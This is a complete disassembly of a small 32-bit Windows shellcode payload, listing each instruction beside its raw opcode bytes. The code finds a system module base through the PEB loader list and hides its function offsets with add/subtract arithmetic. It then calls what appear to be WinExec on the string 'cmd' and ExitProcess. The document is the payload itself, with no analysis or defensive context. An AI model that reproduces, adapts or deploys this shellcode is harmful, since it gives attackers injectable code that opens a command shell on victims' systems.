0x0        xor ecx, ecx                        \x31\xc9                  1.        
0x2        mov esi, dword ptr fs:[ecx + 0x30]  \x64\x8b\x71\x30          d.q0      
0x6        mov esi, dword ptr [esi + 0xc]      \x8b\x76\x0c              .v.       
0x9        mov esi, dword ptr [esi + 0x1c]     \x8b\x76\x1c              .v.       
0xc        mov esi, dword ptr [esi]            \x8b\x36                  .6        
0xe        mov eax, dword ptr [esi]            \x8b\x06                  ..        
0x10       mov ebp, dword ptr [eax + 8]        \x8b\x68\x08              .h.       
0x13       jmp 0x35                            \xeb\x20                  .         

     label_0x15:
0x15       pop ebx                             \x5b                      [         
0x16       push ebx                            \x53                      S         
0x17       push ebp                            \x55                      U         
0x18       pop ebx                             \x5b                      [         
0x19       sub ebx, 0x11111111                 \x81\xeb\x11\x11\x11\x11  ......    
0x1f       add ebx, 0x111a3fda                 \x81\xc3\xda\x3f\x1a\x11  ...?..    
0x25       call ebx                            \xff\xd3                  ..        
0x27       add ebx, 0x11111111                 \x81\xc3\x11\x11\x11\x11  ......    
0x2d       sub ebx, 0x1118cc8c                 \x81\xeb\x8c\xcc\x18\x11  ......    
0x33       call ebx                            \xff\xd3                  ..        
     label_0x35:
0x35       call 0x15                           \xe8\xdb\xff\xff\xff      .....     
0x3a       cmd ; string                       \x63\x6d\x64                        
